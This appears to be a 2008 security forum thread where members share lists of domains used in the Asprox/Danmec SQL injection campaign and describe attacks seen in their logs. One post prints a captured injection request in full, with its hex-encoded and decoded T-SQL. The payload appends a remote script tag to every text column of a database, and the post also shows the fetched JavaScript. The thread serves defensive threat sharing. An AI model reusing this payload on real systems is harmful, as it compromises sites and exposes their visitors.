SQL Injected jscript sites

[YanceySlide]

Ugh, this'll teach me to go away for vacation:
www.adbtch.com
www.aladbnr.com
www.apidad.com
www.appdad.com
www.asodbr.com
www.asslad.com
www.blcadw.com
www.blockkd.com
www.bnradd.mobi
www.bnrbasead.com
www.bnrbtch.com
www.browsad.com
www.brsadd.com
www.clrbbd.com
www.dbgbron.com
www.loctenv.com
www.mainadt.com
www.portadrd.com

[YanceySlide]

New:
www.ausadd.com
www.ausbnr.com
www.crtbond.com
www.gbradw.com
www.usaadp.com
www.usaadw.com
www.usabnr.com

[YanceySlide]

And:

www.destbnp.com
www.gbradp.com

[JohnC]

Thanks.

[YanceySlide]

New:
www.adwnetw.com
www.bnsdrv.com
www.butdrv.com
www.cdrpoex.com
www.cliprts.com
www.drvadw.com
www.hdrcom.com
www.loopadd.com
www.movaddw.com
www.nopcls.com
www.pyttco.com
www.tctcow.com

[YanceySlide]

New:
www.bkpadd.mobi
www.destad.mobi
www.porttw.mobi
www.tertad.mobi

[JohnC]

Thank you.

[YanceySlide]

Only one new one (for now):
www.gitporg.com

[YanceySlide]

Oh, hey, some non-asprox domains:
www.google9.info   
www.loveqianlai.cn
www.hiwowpp.cn

[YanceySlide]

Meh, two more danmec/asprox:
www.addrl.com
www.adpzo.com

[YanceySlide]

New danmec:
www.gbradde.tk

[JohnC]

Thanks.

[spamislame]

I noticed a couple things about these attacks now that a domain I control was recently hit with a variety of exploits (fortunately it's secure against all of them.)

- They only try one type of exploit at a time, and they only attempt it once.
- They use a different ip address for each attempt that they make, indicating that it's a distributed attack and seemingly automated.

The first attack attempted to exploit HORDE, a web mail client, using an outdated and assumedly unpatched version.

All other attacks (three so far) have focused on unpatched or outdated installs of WordPress.

The IP's appear to all be home internet accounts using cable or DSL connections, indicating that the storm infection is behind it (previously discussed, I am sure.)

fyi, if it helps.

SiL

[Orac]

Our log entry

Code: [Select]

***.***.***.*** - - [17/Jul/2008:08:13:32 +0000] "GET /forums/index.php?act=attach&type=post&id=125;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E75736572732E35312E6C612F323031363232322E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E75736572732E35312E6C612F323031363232322E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"
Decoded

Code: [Select]

DECLARE @S CHAR(4000);SET @S=CAST (DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://js.users.51.la/2016222.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://js.users.51.la/2016222.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor) AS CHAR(4000));EXEC(@S);

The link, js.users.51.la/2016222.js gives us

Code: [Select]

document.write ('<a href="http://www.51.la/?2016222" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a6222tf="51la";var a6222pu="";var a6222pf="51la";var a6222su=window.location;var a6222sf=document.referrer;var a6222of="";var a6222op="";var a6222ops=1;var a6222ot=1;var a6222d=new Date();var a6222color="";if (navigator.appName=="Netscape"){a6222color=screen.pixelDepth;} else {a6222color=screen.colorDepth;}<\/script><script>a6222tf=top.document.referrer;<\/script><script>a6222pu =window.parent.location;<\/script><script>a6222pf=window.parent.document.referrer;<\/script><script>a6222ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6222ops=(a6222ops==null)?1: (parseInt(unescape((a6222ops)[2]))+1);var a6222oe =new Date();a6222oe.setTime(a6222oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a6222ops+ ";path=/;expires="+a6222oe.toGMTString();a6222ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6222ot==null){a6222ot=1;}else{a6222ot=parseInt(unescape((a6222ot)[2])); a6222ot=(a6222ops==1)?(a6222ot+1):(a6222ot);}a6222oe.setTime(a6222oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a6222ot+";path=/;expires="+a6222oe.toGMTString();<\/script><script>a6222of=a6222sf;if(a6222pf!=="51la"){a6222of=a6222pf;}if(a6222tf!=="51la"){a6222of=a6222tf;}a6222op=a6222pu;try{lainframe}catch(e){a6222op=a6222su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2016222&tpages=\'+a6222ops+\'&ttimes=\'+a6222ot+\'&tzone=\'+(0-a6222d.getTimezoneOffset()/60)+\'&tcolor=\'+a6222color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a6222of)+\'&vpage=\'+escape(a6222op)+\'" \/>\');<\/script>');

The link in the above code, www.51.la/?2016222  gives us what looks like an automated regestration script

Code: [Select]

  <li><a href="reg.asp">ÉêÇë</a></li>
  <li><a href="login.asp">µÇ¼</a></li>


[YanceySlide]

New danmec:
www.adwr.ru
www.bnrc.ru
www.iogp.ru
www.lodse.ru
www.rrcs.ru
www.sdkj.ru
www.sslwer.ru
www.vcre.ru